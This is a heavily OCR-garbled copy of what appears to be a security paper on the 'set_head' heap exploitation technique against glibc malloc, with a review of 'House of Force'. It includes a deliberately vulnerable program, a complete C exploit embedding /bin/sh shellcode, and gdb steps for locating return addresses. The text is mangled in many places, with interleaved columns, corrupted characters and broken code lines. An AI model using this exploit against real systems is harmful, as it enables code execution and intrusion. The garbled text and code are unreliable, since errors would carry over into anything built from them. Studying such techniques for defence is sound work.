T Ball, R Majumdar, T Millstein, SK Rajamani 
ACM SIGPLAN Notices 2001 


IRM] INTEL reference manual 
http: //www.intel.com/design/pentium4/documentation.htm 


SRM] SPARC reference manual 
http: //www.sparc.org/standards/ 


LAT] Wikipedia : lattice 
http://en.wikipedia.org/wiki/Lattice_%28o0rder%29 


DDA] Data Dependence Analysis of Assembly Code 
ftp://ftp.inria.fr/INRIA/publication/publi-pdf/RR/RR-3764.pdf 


DP] Design Patterns : Elements of Reusable Object-Oriented Software 
Erich Gamma, Richard Helm, Ralph Johnson & John Vlissides 


4a Se5 [ IX. The code 


Feel free to contact me for getting the code. It is not included 
in that article but I will provide it on request if you show 
an interest. 
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--[{ 1 - Introduction 


Many papers have been published in the past describing techniques on how to 
take advantage of the inbound memory management in the GNU C Library 
implementation. 


security advisory on a flaw in the Netscape browser[1]. 
improvements have been made by many different individual 
[5], [6] just to name a few). However, there is always 
gives a lot more trouble than others. Anyone who has al 


A first technique was introduced by Sol 


lar Designer in his 
Since then, many 
ls ([2], [3], [4], 
one situation that 


lready tried to take 


advantage of that situation will agree. How to take control of a vulnerable 
program when the only critical information that you can 
header of the wilderness chunk? 


overwrite is the 


The set_head technique is a new way to obtain a "write almost 4 arbitrary 
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bytes to almost anywhere" primitive. It was born because of a bug in the 
File(1) utility that the author was unable to exploit with existing 
techniques. 


[This paper will present the details of the technique. Also, it will show 
you how to practically apply this technique to other exploits. The 
limitations of the technique will also be presented. Finally, some 
examples will be shown to better understand the various aspects of the 
technique. 


[ 2 The set_head() technique 


Most of the time, people who write exploits using malloc techniques are not 
aware of the difficulties that the wilderness chunk implies until they face 
the problem. It is only at this exact time that they realize how the known 
techniques (i.e. unlink, etc.) have no effect on this particular context. 


As MaXX once said [3]: "The wilderness chunk is one of the most dangerous 
opponents of the attacker who tries to exploit heap mismanagement. Becaus 
this chunk of memory is handled specially by the dlmalloc internal 
routines, the attacker will rarely be able to execute arbitrary code if 
they solely corrupt the boundary tag associated with the wilderness chunk." 


----[ 2.1 - A look at the past - "The House of Force" technique 


To better understand the details of the set_head() technique explained in 
this paper, it would be helpful to first understand what has already been 
done on the subject of exploiting the top chunk. 


This is not the first time that the exploitation of the wilderness chunk 
has been specifically targeted. The pioneer of this type of exploitation 
is Phantasmal Phantasmagoria. 


He first wrote an article entitled "Exploiting the wilderness" about it in 
2004. Details of this technique are out of scope for the current paper, 
but you can learn more about it by reading his paper [5]. 


He gave a second try at exploiting the wilderness in his excellent paper 
"Malloc Maleficarum" [4]. He named his technique "The House of Force". To 
better understand the set_head() technique, the "House of Force" is 
described below. 


The idea behind "The House of Force" is quite simple but there are specific 
steps that need to be followed. Below, you will find a brief summary of 
all the steps. 


Step one: 


The first step in the "House of Force" consists in overflowing the size 
field of the top chunk to make the malloc library think it is bigger than 
it actually is. The preferred new size of the top chunk should be 
Oxffffffff. Below is a an ascii graphic of the memory layout at the time 
of the overflow. Notice that the location of the top chunk is somewhere in 
the heap. 


Oxbfffffff > 


| 
| stack 
| 
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heap <--- Top chunk 


global offset 
table 


text 


0x08048000 > 


Step two: 


After this, a call to malloc with a user-supplied size should be issued. 
With this call, the top chunk will be split in two parts. One part will be 
returned to the user, and the other part will be the remainder chunk (the 
top chunk). 


The purpose of this step is to move the top chunk right before a global 
offset table entry. The new location of the top chunk is the sum of the 
current address of the top chunk and the value of the malloc call. This 
sum is done with the following line of code: 


-—-[ From malloc.c 
remainder = chunk_at_offset (victim, nb); 
After the malloc call, the memory layout should be similar to the 


representation below: 


Oxbfffffff > 


| | 
| stack | 
| | 


heap 


global offset 


table 
< Top chunk 
text 
0x08048000 > 

Step three: 
Finally, another call to malloc needs to be done. This one needs to be 
large enough to trigger the top chunk code. If the user has some sort of 
control over the content of this buffer, he can then overwrit ntries 
inside the global offset table and he can seize control of the process. 


Look at the following representation for the current memory layout at the 
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time of the allocation: 


Oxbfffffff > 


| | 
| stack | 
| | 


heap <---- Top chunk 
global offset - Allocated memory 
table 
text 
0x08048000 > 


----[ 2.2 - The basics of set_head() 


Now that the basic review of the "House of Force" technique is done, let’s 
look at the set_head() technique. The basic idea behind this technique is 
to use the set_head() macro to write almost four arbitrary bytes to almost 
anywhere in memory. This macro is normally used to set the value of the 
size field of a memory chunk to a specific value. lLet’s have a peak at the 
code: 


--[ From malloc.c: 


/* Set size/use field */ 
#define set_head(p, s) ((p)->size = (s)) 


This line is very simple to understand. It takes the memory chunk ’p’, 
modifies its size field and replace it with the value of the variable ’s’. 
If the attacker has control of those two parameters, it may be possible to 
modify the content of an arbitrary memory location with a value that he 
controls. 


To trigger the particular call to set_head() that could lead to this 
arbitrary overwrite, two specific steps need to be followed. These steps 
are described below. 


First step: 


The first step of the set_head() technique consists in overflowing the size 
field of the top chunk to make the malloc library think it is bigger than 
it actually is. The specific value that you will overwrite with will 
depend on the parameters of the exploitable situation. Below is an ascii 
graphic of the memory layout at the time of the overflow. Notice that the 
location of the top chunk is somewhere in the heap. 


Oxbfffffff > 


| 
| stack 
| 
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heap <--- Top chunk 


data 


text 


0x08048000 > 


Second step: 


After this, a call to malloc with a user-supplied size should be issued. 
With this call, the top chunk will be split in two parts. One part will be 
returned to the user, and the other part will be the remainder chunk (the 
top chunk). 


The purpose of this step is to move the top chunk before the location that 
you want to overwrite. This location needs to be on the stack, and you 
will see why at section 4.2.2. During this step, the malloc code will set 
the size of the new top chunk with the set_head() macro. Look at the 
representation below to better understand the memory layout at the time of 
the overwrite: 


Oxbfffffff > 


stack 


size of topchunk 


prev_size not use 


< Top chunk 


heap 


data 


text 


0x08048000 > 
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If you control the new location of the top chunk and the new size of the 
top chunk, you can get a "write almost 4 arbitrary bytes to almost 
anywhere" primitive. 


---=[ 


The set_head macro is used many times in the malloc library. 


2:3 


used at a particularly interesting 


influence its parameters. 
bytes in memory with a value that he can control. 


When there is a call to malloc, 
requested memory. 


— The details of set_head() 


However, 


mplacement wher 
This influence will 


algorithm in section 3.5.1 of his text[3]. 


suggested before continuing with this text. 


the algorithm: 


If those three steps fail, 
tries to split the top chunk. 


Ie 

request; 
2. Try to use th 
Se 


The 


remainder chunk; 


interesting things happen. 
‘use_top’ 


it’s possible to 


Reading his text is highly 
Here are the main points o 


[ry to find a chunk in the regular bins. 


The malloc funct 


it’s 


let the attacker overwrite 4 


different methods are tried to allocate the 
MaXX did a pretty great job at explaining the malloc 


f 


[ry to find a chunk in the bin corresponding to the size of the 


ion 


code portion is then called. 


It’s in that portion of code that it’s possible to take advantage of a call 


to set_head(). 


oi 


From malloc.c 


(unsigned long) (nb + MINSIZ!I 


Let’s analyze the use_top code: 


normalized request size */ 


inspected/selected chunk */ 
its size */ 


remainder from a split */ 
its size */ 


Gl 


nb); 


01 Void_t* 

02 _int_malloc(mstate av, size_t bytes) 

Osi 

04 INTERNAL SIZE_T nb; [% 

05 

06 mchunkptr victim; fx 

07 INTERNAL SIZE_T size; 1% 

08 

09 mchunkptr remainder; ie 

10 unsigned long remainder_size; f* 

11 

‘Le 

13 checked_request2size (bytes, nb); 

14 

15 [ ] 

16 

17 use_top: 

18 

19 victim = av->top; 

20 size = chunksize(victim); 

21 

22 if ((unsigned long) (size) >= 

23 remainder_size = siz nb; 
remainder = chunk_at_offset (victim, 
av->top = remainder; 
set_head(victim, nb | PREV_INUSE | 

(av != &main_arena ? NON_MAIN_ARE 


WWWNNNNN NH 
NPOO ATA SA 


set_head (remainder, 


remainder siz 


NA : 
| PREV_INUSE 


check_malloced_chunk (av, 
return chunk2mem(victim) ; 


victim, 


nb); 
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All the magic happens at line 28. By forcing a particular context inside 
the application, it’s possible to control set_head’s parameters and then 
overwrite almost any memory addresses with almost four arbitrary bytes. 


Let’s see how it’s possible to control these two parameters, which are 
‘remainder’ and ’remainder_size’ 


1. How to get control of ’remainder_size’: 


a. At line 13, '’nb’ is filled with the normalized size of the 
value of the malloc call. The attacker should have control 
on the value of this malloc call. 


b. Remember that this technique requires that the size field of 
the top chunk needs to be overwritten by the overflow. At 
line 19 & 20, the value of the overwritten size field of the 
top chunk is getting loaded in ’size’. 


c. At line 22, a check is done to ensure that the top chunk is 
large enough to take care of the malloc request. The 
attacker needs that this condition evaluates to true to reach 
the set_head() macro at line 28. 


d. At line 23, the requested size of the malloc call is 
subtracted from the size of the top chunk. The remaining 
value is then stored in ’remainder_size’. 


2. How to get control of ’remainder’: 


a. At line 13, '’nb’ is filled with the normalized size of the 
value of the malloc call. The attacker should have control 
of the value of this malloc call. 


b. Then, at line 19, the variable /victim’ gets filled with the 
address of the top chunk. 


c. After this, at line 24, chunk_at_offset() is called. This 
macro adds the content of ‘nb’ to the value of /’/victim’. The 
result will be stored in ’/remainder’. 


Finally, at line 28, the set_head() macro modifies the size field of the 
fake remainder chunk and fills it with the content of the variable 
‘remainder_size’. This is how you get your "write almost 4 arbitrary bytes 
to almost anywhere in memory" primitive. 


-—-[ 3 - Automation 


It was explained in section 2.3 that the variables ’remainder’ and 
‘'remainder_size’ will be used as parameters to the set_head macro. The 
following steps will explain how to proceed in order to get the desired 
value in those two variables. 


----[ 3.1 - Define the basic properties 


Before trying to exploit a security hole with the set_head technique, the 
attacker needs to define the parameters of the vulnerable context. These 
parameters are: 


1. The return location: This is the location in memory that you 
want to write to. It is often referred as ’retloc’ through this 
paper. 


2. The return address: This is the content that you will write to 
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your return location. Normally, this will be a memory address 
that points to your shellcode. It is often referred as ’retadr’ 
through this paper. 


3. The location of the topchunk: To use this technique, you must 
know the exact position of the top chunk in memory. This 
location is often referred as ’toploc’ through this paper. 


----[ 3.2 - Extract the formulas 


The attacker has control on two things during the exploitation stage. 
First, the content of the overwritten top chunk’s size field and secondly, 
the size parameter to the malloc call. The values that the attacker 
chooses for these will determine th xact content of the variables 
‘remainder’ and ’remainder_size’ later used by the set_head() macro. 


Below, two formulas are presented to help the attacker find the appropriate 
values. 


1. How to get the value for the malloc parameter: 


a. The following line is taken directly from the malloc.c code: 


remainder = chunk_at_offset (victim, nb) 
b. ‘nb’ is the normalized value of the malloc call. It’s the 
result of the macro request2size(). To make things simpler, 


let’s add 8 to this value to take care of this macro: 
remainder = chunk_at_offset (victim, nb + 8) 


c. chunk_at_offset() adds the normalized size ’nb’ to the top 
chunk’s location: 


remainder = toploc + (nb + 8) 


e. ‘remainder’ is the return location (i.e. ’retloc’) and ‘’nb’ 
is the malloc size (i.e. ’malloc_size’): 


retloc = toploc + (malloc_size + 8) 


d. Isolate the ’malloc_size’ variable to get the final formula: 


malloc_size = (retloc toploc - 8) 


2. The second formula is how to get the new size of the top chunk. 


a. The following line is taken directly from the malloc.c code: 


remainder_size = siz nb; 


b. '’size’ is the size of the top chunk (i.e. ’topchunk_size’), 
and ’nb’ is the normalized parameter of the malloc call 
(i.e. ‘malloc_size’): 


remainder_size = topchunk_size - malloc_size 


c. ’remainder_size’ is in fact the return address 
(i.e. retadr’): 


retadr = topchunk_size - malloc_size 
d. Isolate ’topchunk_size’ to get the final formula: 


topchunk_size = retadr + malloc_size 
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e. topchunk_size will get its three least significant bits 
cleared by the macro chunksize(). Let’s consider this in the 
formula by adding 8 to the right side of the equation: 


topchunk_size = (retadr + malloc_size + 8) 


g. Take into consideration that the PREV_INUSE flag is being set 
in the set_head() macro: 


GJ 


topchunk_size = (retadr + malloc_size + 8) | PREV_INUS 


----[ 3.3 - Compute the values 


You now have the two basic formulas: 


1. malloc_size = (retloc toploc —- 8) 


Gl 


2. topchunk_size = (retadr + malloc_size + 8) | PREV_INUS! 


You can now proceed with finding the exact values that you will plug into 
your exploit. 


To facilitate the integration of those formulas in your exploit code, you 


can use the set_head_compute() function found in the file(1) utility 
exploit code (refer to section 6.2.3). Here is the prototype of the 
function: 


struct sethead * set_head_compute 
(unsigned int retloc, unsigned int retadr, unsigned int toploc) 


The structure returned by the function set_head_compute() is defined this 
way: 


struct sethead { 
unsigned long topchunk_size; 
unsigned long malloc_size; 


By giving this function your return location, your return address and your 
top chunk location, it will compute the exact malloc size and top chunk 
size to use in your exploit. It will also tell you if it’s possible to 
xecute the requested write operation based on the return address and the 
return location you have chosen. 


--[{ 4 - Limitations 


At the time of writing this paper, there was no simple and easy way to 
exploit a heap overflow when the top chunk is involved. Each exploitation 
technique needs a particular context to work successfully. The set_head 
technique is no different. It has some requirements to work properly. 


Also, it’s not a real "write 4 arbitrary bytes to anywhere" primitive. In 
fact, it would be more of a "write almost 4 arbitrary bytes to almost 
anywhere in memory" primitive. 


----[ 4.1 - Requirements of two different techniques 


Specific elements need to be present to exploit a situation in which the 
wilderness chunk is involved. Thes lements tend to impose a lot of 
constraints when trying to exploit a program. Below, the requirements for 
the set_head technique are listed, alongside those of the "House of Force" 
technique. As you will see, each technique has its pros and cons. 
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SS [ 4.1.1 - The set_head() technique 
Minimum requirements: 


1. The size field of the topchunk needs to be overwritten with a 
value that the attacker can control; 


2. Then, there is a call to malloc with a parameter that the 
attacker can control; 


This technique will let you write almost 4 arbitrary bytes to almost 
anywhere. 

SSSSe [ 4.1.2 The "House of Force" technique 

Minimum requirements: 


1. The size field of the topchunk must be overwritten with a very 
large value; 


2. Then, there must be a first call to malloc with a very large 
size. An important point is that this same allocated buffer 
should only be freed after the third step. 


3. Finally, there should be a second call to malloc. This buffer 
should then be filled with some user supplied data. 


This technique will, in the best-case scenario, let you overwrite any 
region in memory with a string of an arbitrary length that you control. 


----[ 4.2 - Almost 4 bytes to almost anywhere technique 
This set_head technique is not really a "write 4 arbitrary bytes anywhere 
in memory" primitive. There are some restrictions in malloc.c that greatly 
limit the possible values an attacker can use for the return location and 
the return address in an exploit. Still, it’s possible to run arbitrary 
code if you carefully choose your values. 


Below you will find the three main restrictions of this technique: 


-a--- > [ 4.2.1 - Everything in life is a multiple of 8 


A disadvantage of the set_head technique is the presence of macros that 


ensure memory locations and values are a multiple of 8 bytes. These macros 
are: 
checked_request2size() and 
— chunksize() 


Ultimately, this will have some influence on the selection of the return 
location and the return address. 


[The memory addresses that you can overwrite with the set_head technique 
need to be aligned on a 8 bytes boundary. Interesting locations to 
overwrite on the stack usually include a saved EIP of a stack frame or a 
function pointer. These pointers are aligned on a 4 bytes boundary, so with 
this technique, you will be able to modify one memory address on two. 


The return address will also need to be a multiple of 8 (not counting the 
logical OR with PREV_INUSE). Normally, the attacker has the possibility of 
providing a NOP cushion right before his shellcode, so this is not really a 
big issue. 
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Se [ 4.2.2 - Top chunk’s size needs to be bigger than the requested 
malloc size 


This is the main disadvantage of the set_head technique. For the top chunk 
code to be triggered and serve the memory request, there is a verification 
before the top chunk code is executed: 


--[ From malloc.c 


if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZI 


GI 
~~ 
~~ 
a 


In short, this line requires that the size of the top chunk is bigger than 
the size requested by the malloc call. Since the variable ’size’ and ‘nb’ 
are computed from the return location, the return address and the top 
chunk’s location, it will greatly limit the content and the location of the 
arbitrary overwrite operation. There is still a valid combination of a 
return address and a return location that exists. 


Let’s see what the value of ’size’ and ’nb’ for a given return location and 
return address will be. Let’s find out when there is a situation in which 
‘size’ is greater than ’nb’. Consider the fact that the location of the 
top chunk is static and it’s at 0x080614f8: 


return return size nb 
location address 
0x0804b150 0x08061000 134523993 4294876240 
0x0804b150 Oxbffffbaa 3221133059 4294876240 
Oxbffffaaa Oxbffffbaa 2012864861 3086607786 
Oxbffffaaa 0x08061000 3221222835 3086607786 <- Tliyt 


As you can see from this chart, the only time that you get a situation 
where /’size’ is greater than ’nb’ is when your return location is somewhere 
in the stack and when your return address is somewhere in the heap. 


GJ 


SSeS [ 4.2.3 - Logical OR with PREV_INUS 


When the set_head macro is called, '’remainder_size’, which is the return 
address, will be altered by a logical OR with the flag PREV_INUSE: 


--[ From malloc.c 


#define PREV_INUSE Oxl 


set_head(remainder, remainder_siz | PREV_INUS 


GJ 


i 


It was said in section 4.2.1 that the return address will always be a 
multiple of 8 bytes due to the normalisation of some macros. With the 
PREV_INUSE logical OR, it will be a multiple of 8 bytes, plus 1. With an 
NOP cushion, this problem is solved. Compared to the previous two, this 


restriction is a very small one. 


--[ 5 - Taking set_head() to the next level 


As a general rule, hackers try to make their exploit as reliable as 
possible. Exploiting a vulnerability in a confined lab and in the wild are 
two different things. This section will try to present some techniques to 
improve the reliability of the set_head technique. 


----[ 5.1 - Multiple overwrites 


One way to make the exploitation process a lot more reliable is by using 
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multiple overwrites. Indeed, having the possibility of overwriting a 
memory location with 4 bytes is good, but the possibility to write multiple 
times to memory is even better[8]. Being able to overwrite multiple memory 
locations with set_head will increase your chance of finding a valid return 
location on the stack. 


A great advantage of the set_head technique is that it does not corrupt 
internal malloc information in a way that prevents the program from working 
properly. This advantage will let you safely overwrite more than one 
memory location. 


To correctly put this technique in place, the attacker will need to start 
overwriting addresses at the top of the stack, and go downward until he 


seizes control of the program. Here are the possible addresses that 
set_head() lets you overwrite on the stack: 

1s Oxbktfttite 

2: Oxbffffff4 

3: Oxbfffffec 

4: Oxbfffffe4 

5: Oxbfffffdc 

6: Oxbfffffd4 

Ts Oxbtrrittec 

8: Oxbfffffc4 

9: 


Eventually, the attacker will fall on a memory location which is a saved 
EIP in a stack frame. If he’s lucky enough, this new saved EIP will be 
popped in the EIP register. 


Remember that for a successfull overwrite, the attacker needs to do two 
things: 


1. Overwrite the top chunk with a specific value; 
2. Make a call to malloc with a specific value. 


Based on the formulas that were found in section 3.3, let’s compute the 
values for the top chunk size and the size for the malloc call for each 
overwrite operation. Let’s take the following values for an example case: 


The location of the top chunk: 0x08050100 
The return address: 0x08050200 
The return location: Decrementing from Oxbffffffc 


to Oxbfffffc4 


return top chunk malloc 

location size size 

Oxbff S221 2257.25 3086679796 
Oxbff 3221225717 3086679788 
Oxbff 3221225709 3086679780 
Oxbff 3221225701 3086679772 
Oxbff 3221225693 3086679764 
Oxbff 3221225685 3086679756 
Oxbff 3221225677 3086679748 
Oxbff 3221225669 3086679740 


By looking at this chart, you can determine that for each overwrite 
operation, the attacker would need to overwrite the size of the top chunk 
with a new value and make a call to malloc with an arbitrary value. Would 
it be possible to improve this a little bit? It would be great if the only 
thing you needed to change between each overwrite operation was the size of 
the malloc call, leaving the size of the top chunk untouched. 
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Ss possible. Look closely at the functions used to compute 
and topchunk_size. Let’s say the attacker has only one 
to overwrite the size of the top chunk, would it still be 
do multiple overwrites using the set_head technique while 
same size for the top chunk? 


1. malloc_size = (retloc toploc —- 8) 
2. topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE 
If you look at how ’topchunk_size’ is computed, it seems possible. By 
changing the value of ’retloc’, it will affect ’malloc_size’. Then, 
‘'malloc_size’ is used to compute ‘/topchunk_size’. By playing with ’retadr’ 
in the second formula, you can always hit the same ’topchunk_size’ Let’s 
look at the sam xample, but this time with a changing return address. 
While the return location is decrementing by 8, let’s increment the return 
address by 8. 
return return top chunk malloc 

location address size size 

Oxb 0x8050200 3221225725 3086679796 

Oxb 0x8050208 3221225725 3086679788 

Oxb 0x8050210 3221225725 3086679780 

Oxb 0x8050218 3221225725 3086679772 

Oxb 0x8050220 3221225725 3086679764 

Oxb 0x8050228 3221225725 3086679756 

Oxb 0x8050230 3221225725 3086679748 

Oxbffft 0x8050238 3221225725 3086679740 
You can see that the size of the top chunk is always the same. On the 


other hand, 
The attacke 
variation. 


Refer to se 
with multip 


SZ 


---=[ 


As was stat 
make even a 
exploits tr 
infoleak te 
well, that’ 
relies onu 


When there 
the program 
this knowle 
situation, 


The theory 
address of 
Oxbffffffc 


Indeed, aw 
address is 
variables o 


the return address changes through the multiple overwrites. 
r needs to have an NOP cushion big enough to adapt to this 


ction 6.1.2.1 to get a sample vulnerabl 


le overwrites. 


scenario exploitable 


Infoleak 


ed in the Shellcoder’s Handbook[9]: "An information leak can 
difficult bug possible". Most of the time, people who write 
y to make them as reliable as possible. If hackers, using an 
chnique, can improve the reliability of the set_head technique, 
s pretty good. The technique is already hard to use because it 


nknown memory locations, which are: 

he return location 

he top chunk location 

The return address 

is an overwrite operation, if the attacker is able to tell if 
has crashed or not, he can turn this to his advantage. Indeed, 


dge could help him find one parameter of the exploitable 


which is the top chunk location. 


behind this technique is simple. If the attacker has the real 
the top chunk, he will be able to write at the address 


but not at the address 0xc0000004. 
rite operation at the address Oxbffffffc will work because this 
in the stack and its purpose is to store the environment 


f the program. It does not significantly affect the behaviour 
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of the program, so the program will still continue to run normally. 


On the other hand, if the attacker wrote in memory starting from 
Oxc0000000, there will be a segmentation fault because this memory region 
is not mapped. After this violation, the program will crash. 


To take advantage of this behaviour, the attacker will have to do a series 
of write operations while incrementing or decrementing the location of the 


top chunk. For each top chunk location tried, there should be 6 write 
operations. 
Below, you will find the parameters of the exploitable situation to use 


during the 6 write operations. Th xpected result is in the right column 
of the chart. If you get these results, then the value used for the 
location of the top chunk is the right one. 


return return Did it 
location address segfault ? 
O0xc0000014 0x07070707 Yes 
O0xc000000c 0x07070707 Yes 
0xc0000004 0x07070707 Yes 
Oxbffffffc 0x07070707 No 
Oxbffffff4 0x07070707 No 
Oxbfffffec 0x07070707 No 


If the six write operations made the program segfault each time, then the 
attacker is probably writing after Oxbfffffff or below the limit of the 
stack. 


If the 6 write operations succeeded and the program did not crash, then it 
probably means that the attacker overwrote some values in the stack. In 
that case, decrement the value of the top chunk location to use. 


--[ 6 — 


Examples 


The best way to learn something new is probably with the help of examples. 
Below, you will find some vulnerable codes and their exploits. 


A scenario-based approach is taken here to demonstrate the exploitability 
of a situation. Ultimately, the exploitability of a context can be defined 
by specific characterictics. 


Also, the application of the set_head() technique on a real life example is 
shown with the file(1l) utility vulnerability. The set_head technique was 
found to exploit this specific vulnerability. 


6.1 - The basic scenarios 


To simplify things, it’s useful to define exploitable contexts in terms of 
scenarios. For each specific scenario, there should be a specific way to 
exploit it. Once the reader has learned those scenarios, he can then match 
them with vulnerable situations in softwares. He will then know exactly 
what approach to use to make the most out of the vulnerability. 


6.1.1.1 - The most basic form of the set_head() technique 
This scenario is the most basic form of the application of the set_head() 
technique. This is the approach that was used in the file(1) utility 


exploit. 


scenariol.c 
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include <stdio.h> 
include <stdlib.h> 


int main (int argc, char *argv[]) { 


char *bufferl; 
char *buffer2; 
unsigned long size; 


/* [1] */ bufferl = (char *) malloc (1024); 
/* [2] */ sprintf (bufferl, argv[1]); 


size = strtoul (argv[2], NULL, 10); 


/* [3] ¥*/ buffer2 = (char *) malloc (size); 


return 0; 


nd of scenariol.c 
Here is a brief description of the important lines in this code: 
[1]: The top chunk is split and a memory region of 1024 bytes is requested. 


[2]: A sprintf call is made. The destination buffer is not checked to see 
if it is large enough. The top chunk can then be overwritten here. 


[3]: A call to malloc with a user-supplied size is done. 


S25 a— [ 6.1.1.2 - Exploit 


xpl.c 


Exploit for scenariol.c 


include <stdio.h> 
include <stdlib.h> 
include <string.h> 
include <unistd.h> 


// The following #define are from malloc.c and are used 

// to compute the values for the malloc size and the top chunk size. 

define PREV_INUSE Oxl 

define SIZE BITS 0x7 // PREV_INUSE|IS_MMAPPED | NON_MATIN_ARENA 

define SIZE SZ (sizeof(size_t)) 

define MALLOC_ALIGNMENT (2 * SIZE_SZ) 

define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT —- 1) 

define MIN_CHUNK_SIZE 16 

define MINSIZE (unsigned long) ( ( (MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \ 

& ~MALLOC_ALIGN_MASK) ) 

define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \ 
E) ?MINSIZE : ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) \ 

& ~MALLOC_ALIGN_MASK) 


struct sethead { 
unsigned long topchunk_size; 
unsigned long malloc_size; 


}; 


/* linux_ia32_exec - CMD=/bin/sh Size=68 Encoder=PexFnstenvSub 
http://metasploit.com */ 

unsigned char scode[] = 

"\x31\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27" 
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"\xe2\xc0\xb3\x83\xeb\xfc\xe2\xf£4\x4d\xe9\x98\x2a\x75\x84\xa8\x9e" 
"\x44\x6b\x27\xdb\x08\x91\xa8\xb3\x4f£\xcd\xa2\xda\x49\x6b\x23\xel" 
"\xcf\xea\xc0\xb3\x27\xcd\xa2\xda\x49\xcd\xb3\xdb\x27\xb5\x93\x3a" 
"\xc6\x2£\x40\xb3"; 


struct sethead * set_head_compute 
(unsigned long retloc, unsigned long retadr, unsigned long toploc) { 


unsigned long check_retloc, check_retadr; 
struct sethead *shead; 


shead = (struct sethead *) malloc (8); 
if (shead == NULL) { 
fprintf (stderr, 
"--—[ Could not allocate memory for sethead structure\n"); 
exit (1); 
} 


if ( (toploc % 8) !=0) { 
fprintf (stderr, 
"--[ Impossible to use 0x%x as the top chunk location.", 


toploc); 
toploc = toploc - (toploc % 8); 
fprintf (stderr, " Using 0x%x instead\n", toploc); 


} else 
fprintf (stderr, 
"--[ Using O0x%x as the top chunk location.\n", toploc); 


// The minus 8 is to take care of the normalization 
// of the malloc parameter 
shead->malloc_size = (retloc toploc —- 8); 


// By adding the 8, we are able to sometimes perfectly hit 
// the return address. To hit it perfectly, retadr must be a multiple 
// of 8 + 1 (for the PREV_INUSE flag). 
shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE; 


if (shead->topchunk_size < shead->malloc_size) { 
fprintf (stderr, 
"--[ ERROR: topchunk size is less than malloc size.\n"); 
fprintf (stderr, "--[ Topchunk code will not be triggered\n"); 
exit (1); 


} 


check_retloc = (toploc + request2size (shead->malloc_size) + 4); 
if (check_retloc != retloc) { 
fprintf (stderr, 
"--[{ Impossible to use 0x%x as the return location. ", retloc); 
fprintf (stderr, "Using 0x%x instead\n", check_retloc); 
} else 
fprintf (stderr, "--[ Using 0x%x as the return location.\n", 
retloc); 
check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS) ) 
-— request2size (shead->malloc_size)) | PREV_INUSE; 
if (check_retadr != retadr) { 


fprintf (stderr, 
"--[ Impossible to use 0x%x as the return address.", retadr); 


fprintf (stderr, " Using 0x%x instead\n", check_retadr) ; 
} else 
fprintf (stderr, "--[ Using 0x%x as the return address.\n", 
retadr); 


return shead; 
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put_byte (char *ptr, unsigned char data) 


*otr = data; 
} 
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{ 


void 
put_longword (char *ptr, unsigned long data) { 
put_byte (ptr, data); 
put_byte (ptr + 1, data >> 8); 
put_byte (ptr + 2, data >> 16); 
put_byte (ptr + 3, data >> 24); 
} 
int main (int argc, char *argv[]) { 


char *buffer; 

char malloc_size_string[20]; 
unsigned long retloc, retadr, 
unsigned long topchunk_size, 
struct sethead *shead; 


toploc; 
malloc_size; 


if ( arge != 4) 
printf ("wrong number of arguments, exiting...\n\n"); 
printf ("Ss <retloc> <retadr> <toploc>\n\n", argv[0]); 
return 1; 

} 

sscanf (argv[1], "0Ox%x", &retloc); 

sscanf (argv[2], "Ox%x", &retadr); 

sscanf (argv[3], "0x%x", &toploc); 

shead = set_head_compute (retloc, retadr, toploc); 


topchunk_size = 
malloc_size = 


shead->topchunk_size; 
shead->malloc_size; 


buffer = (char *) malloc (1036); 

memset (buffer, 0x90, 1036); 

put_longword (buffer+1028, topchunk_size); 

memcpy (buffert+1028-strlen(scode), scode, strlen (scode)); 
buffer [1032]=0x0; 

snprintf (malloc_size_string, 20, "Su", malloc_size); 

execl ("./scenariol", "scenariol", buffer, malloc_size_string, 


NULL) ; 


return 0; 


nd of expl 


th 


ar 


1- The first step is to generate a core 
program. You will then have to analyze 
values for your exploit. 


th file, 


To generat cor 


by getting the base address of the BSS section. 


start just after the BSS section: 


./scenariol | 
NOBITS 


bash$ readelf -S 
[22] .bss 


grep bss 


~Cc 


steps to find the 3 memory values to use for this exploit. 


dump file from the vulnerable 
this core dump to find the proper 


get an approximation of the top chunk location 


Normally, the heap will 


080495e4 0005e4 000004 
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The BSS section starts at 0x080495e4. 


18 
Let’s call the exploit the following 


way, and remember to replace 0x080495e4 for the BSS value you have found: 
bashS ./expl OxcOc0Oc0c0O 0x080495e4 0x080495e4 

--[ Impossible to use 0x80495e4 as the top chunk location. Using 0x80495e0 
instead 

-—-[ Impossible to use OxcOcOc0Oc0O as the return location. Using Oxc0c0c0c4 
instead 

--[ Impossible to use 0x80495e4 as the return address. Using 0x80495el1 
instead 

Segmentation fault (core dumped) 

bashs$ 


2- Call gdb on that core dump file. 


bash$ gdb -q scenariol core.2212 

Core was generated by ‘scenariol’. 

Program terminated with signal 11, Segmentation fault. 
Reading symbols from /usr/lib/debug/libc.so.6...done. 
Loaded symbols for /usr/lib/debug/libc.so.6 

Reading symbols from /lib/ld-linux.so.2...done. 

Loaded symbols for /lib/ld-linux.so.2 


#0 _int_malloc (av=0x40140860, bytes=1075054688) at malloc.c:4082 

4082 set_head(remainder, remainder_siz | PREV_INUSE) ; 

(gdb) 

3- The ESI register contains the address of the top chunk. It might be 
another register for you. 


(gdb) info reg esi 
esi 0x8049a38 
(gdb) 


134519352 


4-—- Start searching before the location of the top chunk to find the NOP 


cushion. This will be the return address. 

0x8049970: 0x90909090 0x90909090 0x90909090 0x90909090 
0x8049980: 0x90909090 0x90909090 0x90909090 0x90909090 
0x8049990: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80499a0: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80499b0: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80499c0: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80499d0: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80499e0: 0x90909090 0x90909090 0x90909090 0xe983c931 
0x80499f0: Oxd9eed9f5 Ox5bf£42474 0x27137381 Ox83b3c0e2 
0x8049a00: Oxf4e2fceb O0x2a98e94d O0x9ea88475 Oxdb276b44 
(gdb) 

0x8049990 is a valid address. 


5- To get th 


return location for your exploit, 


stack frame. 

